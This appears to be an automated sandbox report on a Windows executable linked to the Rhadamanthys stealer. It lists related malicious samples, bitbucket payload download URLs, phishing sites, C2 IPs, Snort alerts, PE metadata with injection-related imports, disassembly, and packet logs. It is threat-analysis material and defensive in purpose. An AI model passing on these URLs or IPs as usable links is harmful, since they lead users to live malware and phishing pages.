HCA Information:	Successful, ratio: 56% Number of executed functions: 148 Number of non-executed functions: 4

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.114.59.183, 93.184.221.240, 192.229.221.95, 13.95.31.18, 20.242.39.171
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target dialer.exe, PID 8032 because there are no executed function
Execution Graph export aborted for target nF54KOU30R.exe, PID 7568 because there are no executed function
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:10:16	API Interceptor	1x Sleep call for process: wmplayer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.192.141.1	A662vmc5co.exe	Get hash	malicious	Unknown	Browse	bitbucket.org/kennethoswald1/aoz918/downloads/LEraggt.exe
	lahPWgosNP.exe	Get hash	malicious	Amadey	Browse	bitbucket.org/alex222111/testproj/downloads/s7.exe
	SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsx	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
	SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsx	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
	SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsx	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets
	SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsx	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets
	Paid invoice.ppa	Get hash	malicious	AgentTesla	Browse	bitbucket.org/!api/2.0/snippets/warzonepro/Egjbp5/1b96dd9b300f88e62e18db3170d33bf037793d72/files/euromanmain
	PO#1487958_10.ppa	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal
	Purchase Inquiry_pdf.ppa	Get hash	malicious	AgentTesla	Browse	bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
	Purchase Inquiry_pdf.ppa	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bitbucket.org	dfzesJIgdr.exe	Get hash	malicious	RedLine, Vidar	Browse	104.192.141.1
	InvoiceandLast 4 Digit CC.lnk	Get hash	malicious	XWorm	Browse	104.192.141.1
	Equipment Specs.lnk	Get hash	malicious	XWorm	Browse	104.192.141.1
	DHL Mondaydelivery requirement.vbs	Get hash	malicious	Unknown	Browse	104.192.141.1
	6tJtH22I7a.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse	104.192.141.1
	pending delivery needs attention.vbs	Get hash	malicious	Unknown	Browse	104.192.141.1
	Daily dhl report(tuesday_delayed delivery address was not found).vbs	Get hash	malicious	Unknown	Browse	104.192.141.1
	9243x1BVaT.exe	Get hash	malicious	RedLine	Browse	104.192.141.1
	file.exe	Get hash	malicious	PrivateLoader	Browse	104.192.141.1
	l4XEL1mHW4.exe	Get hash	malicious	Mars Stealer, PrivateLoader, Stealc, Vidar	Browse	104.192.141.1
fp2e7a.wpc.phicdn.net	https://url.au.m.mimecastprotect.com/s/uuv2CgZowrsOpyOOc26VTV?domain=in.xero.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://shop.ketochow.xyz/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsV	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://cctv.hotmail.cloudns.org/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://toenpocket.pro/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://wuyouo.cn/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://ms-1drive.com/v/794850bf-f104-442e-acb0-475634834dda	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://pub-f99e2b2dafd440acb935db5a40c7576b.r2.dev/index.html	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://ssl4837289ssl24663521542877.searchmarketingservices.dev/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://simxtrackredirecttszz.pages.dev/	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TERASYST-ASBG	Home Purchase Contract and Property Details.xls	Get hash	malicious	Remcos, DBatLoader	Browse	94.156.67.72
	Swift mt103 483932024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	94.156.67.228
	1716402308262aedf7d56a024eb3c1ba5eacf734db4f110a1cdb89ce86eee5e5f3269b8667772.dat-decoded.exe	Get hash	malicious	Remcos	Browse	94.156.69.96
	5021036673.exe	Get hash	malicious	Nanocore, AgentTesla, PureLog Stealer	Browse	94.156.68.219
	hwUz69Q8ZN.exe	Get hash	malicious	XWorm	Browse	94.156.68.231
	Swift copy.exe	Get hash	malicious	XWorm	Browse	94.156.68.231
	IMG1024785000.exe	Get hash	malicious	Nanocore, AgentTesla, PureLog Stealer	Browse	94.156.68.219
	15qMoP89vl.elf	Get hash	malicious	Unknown	Browse	94.156.68.228
	ZQYQWLpDEQ.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.71.230
	kI6xUIRFpY.elf	Get hash	malicious	Unknown	Browse	94.156.68.228
AMAZON-02US	https://www.unsubv1.site/	Get hash	malicious	Unknown	Browse	54.73.26.109
	https://url.au.m.mimecastprotect.com/s/uuv2CgZowrsOpyOOc26VTV?domain=in.xero.com	Get hash	malicious	Unknown	Browse	52.18.219.127
	https://shop.ketochow.xyz/	Get hash	malicious	Unknown	Browse	13.32.99.84
	https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsV	Get hash	malicious	Unknown	Browse	52.222.236.71
	https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsV	Get hash	malicious	Unknown	Browse	13.33.187.74
	http://toenpocket.pro/	Get hash	malicious	HTMLPhisher	Browse	13.124.82.135
	http://wuyouo.cn/	Get hash	malicious	Unknown	Browse	108.139.243.14
	https://pub-f99e2b2dafd440acb935db5a40c7576b.r2.dev/index.html	Get hash	malicious	Unknown	Browse	52.58.254.253
	http://simxtrackredirecttszz.pages.dev/	Get hash	malicious	Unknown	Browse	18.239.102.57
	http://advanceweb-netzero-2023.square.site/	Get hash	malicious	Unknown	Browse	18.239.18.91

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	DNSBench.exe	Get hash	malicious	Unknown	Browse	104.192.141.1
	DNSBench.exe	Get hash	malicious	Unknown	Browse	104.192.141.1
	kam.cmd	Get hash	malicious	GuLoader	Browse	104.192.141.1
	zap.cmd	Get hash	malicious	GuLoader, XWorm	Browse	104.192.141.1
	xff.cmd	Get hash	malicious	GuLoader, XWorm	Browse	104.192.141.1
	las.cmd	Get hash	malicious	GuLoader	Browse	104.192.141.1
	zap.cmd	Get hash	malicious	GuLoader, XWorm	Browse	104.192.141.1
	xff.cmd	Get hash	malicious	AsyncRAT, GuLoader	Browse	104.192.141.1
	new.cmd	Get hash	malicious	GuLoader	Browse	104.192.141.1
	las.cmd	Get hash	malicious	GuLoader	Browse	104.192.141.1
caec7ddf6889590d999d7ca1b76373b6	wdeeFKntav.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	devpas.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	Aj4OpKP0Zu.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	MoqMg029JT.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	decoded-20240415132315.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	roland.ps1	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	FRS3587.js	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	g.ps1	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	NervousGrammar.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91
	app.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.156.67.91

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.731576565137444
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nF54KOU30R.exe
File size:	5'007'872 bytes
MD5:	ea37157ee7ab8afb57a0f8e09afc8bec
SHA1:	adb8dd210e87687ce11781f3003aaadff9698dcc
SHA256:	75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
SHA512:	f92aad768588f46b718fa609e53b9af833c38fc973cf183ee0ce0bed0baab4f31b409c2c5b09097e18bb78646b143a5619d82a8167ad735f3971f84a08f32a55
SSDEEP:	98304:5oLQ+pj1w8fEdKHoZJAA+7c9e0gh+tpybA8DpGGJIS4OnZXW3NnBJfq9mSH:ZOZVH
TLSH:	683677DE262DF40A8DA91FC079AD6191212B17F49238313D3FF65B9B4A6C61D29C3CB4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................\|.......z.......{.....kW{.....kW\|.....kWz.......~.......~.....ZTv.....ZT}.....Rich............PE..L....gBf...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x874051
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66426706 [Mon May 13 19:16:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b0c9db535d52c5298922aca6c11bb724

Entrypoint Preview

Instruction
call 00007F83B56824A1h
jmp 00007F83B5681CAFh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F83B5681E4Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F83B5681E3Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F83B5681E3Eh
add edx, 28h
cmp edx, esi
jne 00007F83B5681E1Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F83B5681E2Bh
push esi
call 00007F83B5682764h
test eax, eax
je 00007F83B5681E52h
mov eax, dword ptr fs:[00000018h]
mov esi, 0089FDA0h
mov edx, dword ptr [eax+04h]
jmp 00007F83B5681E36h
cmp edx, eax
je 00007F83B5681E42h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F83B5681E22h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F83B5681E39h
mov byte ptr [0089FDA4h], 00000001h
call 00007F83B56820BBh
call 00007F83B5683818h
test al, al
jne 00007F83B5681E36h
xor al, al
pop ebp
ret
call 00007F83B5688BF7h
test al, al
jne 00007F83B5681E3Ch
push 00000000h
call 00007F83B568381Fh
pop ecx
jmp 00007F83B5681E1Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0089FDA5h], 00000000h
je 00007F83B5681E36h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x49d6bc	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a1000	0x28f10	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x49bf60	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x49bfc0	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x49bea0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x48b000	0x1ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4897db	0x489800	c303541259ff9e5cd8681f5f1b04edd5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x48b000	0x13044	0x13200	23bcd3f07213b298cb2cdb096f685093	False	0.5662785947712419	data	5.973702511613357	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x49f000	0x18e0	0xc00	63e93f14de378331abcac3d1c55d866b	False	0.1640625	DOS executable (block device driver \377\377\377\377)	2.1736395022604906	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x4a1000	0x28f10	0x29000	b44dc172740b228c575e8ec22a2edd6f	False	0.644310927972561	data	6.809757011897555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObject, ResumeThread, GetModuleHandleA, OpenProcess, GetFileAttributesA, LoadLibraryA, CloseHandle, LoadLibraryW, CreateThread, GetThreadContext, WriteConsoleW, GetProcAddress, VirtualAllocEx, ReadProcessMemory, GetModuleHandleW, FreeLibrary, CreateProcessA, FindClose, GetComputerNameA, GetExitCodeProcess, HeapSize, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, GetProcessHeap, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, TerminateProcess, VirtualAlloc, WriteProcessMemory, VirtualProtect, SetThreadContext, FindFirstFileW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, LCMapStringW, GetFileType, HeapReAlloc, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, CreateFileW
USER32.dll	DefWindowProcW, MessageBoxW, CreateWindowExW, RegisterClassExW, ShowWindow, DispatchMessageW, GetMessageW, LoadIconW, LoadCursorW, PostQuitMessage, UpdateWindow, BeginPaint, EndPaint, TranslateMessage
GDI32.dll	TextOutW, SetTextColor, Polyline
ADVAPI32.dll	GetUserNameA

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/24/24-05:10:13.401057	TCP	2854802	ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert	6939	49740	94.156.67.91	192.168.2.4
05/24/24-05:10:00.411707	TCP	2854802	ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert	6939	49738	94.156.67.91	192.168.2.4
05/24/24-05:09:48.485817	TCP	2854802	ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert	6939	49737	94.156.67.91	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 05:09:09.627722025 CEST	49678	443	192.168.2.4	104.46.162.224
May 24, 2024 05:09:09.924777031 CEST	49675	443	192.168.2.4	173.222.162.32
May 24, 2024 05:09:19.534178972 CEST	49675	443	192.168.2.4	173.222.162.32
May 24, 2024 05:09:39.235836983 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:39.235915899 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:39.236017942 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:39.249247074 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:39.249315023 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:39.897228956 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:39.897325039 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:39.996295929 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:39.996371031 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:39.997355938 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:39.997534037 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.013407946 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.054497004 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.208146095 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.208379984 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.213855982 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.213880062 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.214051008 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.214108944 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.214168072 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.295710087 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.296034098 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.301870108 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.302083969 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.302140951 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.302208900 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.305423021 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.305605888 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.306705952 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.306885004 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.313699961 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.313780069 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.313891888 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.313891888 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.313952923 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.314009905 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.389714956 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.389889956 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.390036106 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.390036106 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.390096903 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.390152931 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.392415047 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.392595053 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.393536091 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.393709898 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.399172068 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.399236917 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.399394989 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.399394989 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.399456024 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.399523020 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.400587082 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.400785923 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.405431032 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.405500889 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.405530930 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.405580997 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.405620098 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.405642033 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.406275988 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.406459093 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.410751104 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.410821915 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.411139011 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.411197901 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.411273956 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.474272966 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.474630117 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.478821993 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.478910923 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.479032040 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.479032993 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.479093075 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.479149103 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.479765892 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.479940891 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.483778954 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.483841896 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.483897924 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.483933926 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.483969927 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.483994961 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.484481096 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.484659910 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.488238096 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.488296986 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.488341093 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.488377094 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.488415956 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.488439083 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.488899946 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.489084959 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.492371082 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.492430925 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.492461920 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.492499113 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.492536068 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.492558002 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.493328094 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.493499041 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.496115923 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.496174097 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.496205091 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.496241093 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.496284962 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.496308088 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.497003078 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.497195959 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.499706030 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.499766111 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.499799013 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.499834061 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.499871016 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.499892950 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.500452042 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.500646114 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.502816916 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.502882957 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.503032923 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.503063917 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.503150940 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.517930031 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.518116951 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.565237999 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.565398932 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.565426111 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.565490961 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.565540075 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.565540075 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.565974951 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.566142082 CEST	49736	443	192.168.2.4	104.192.141.1
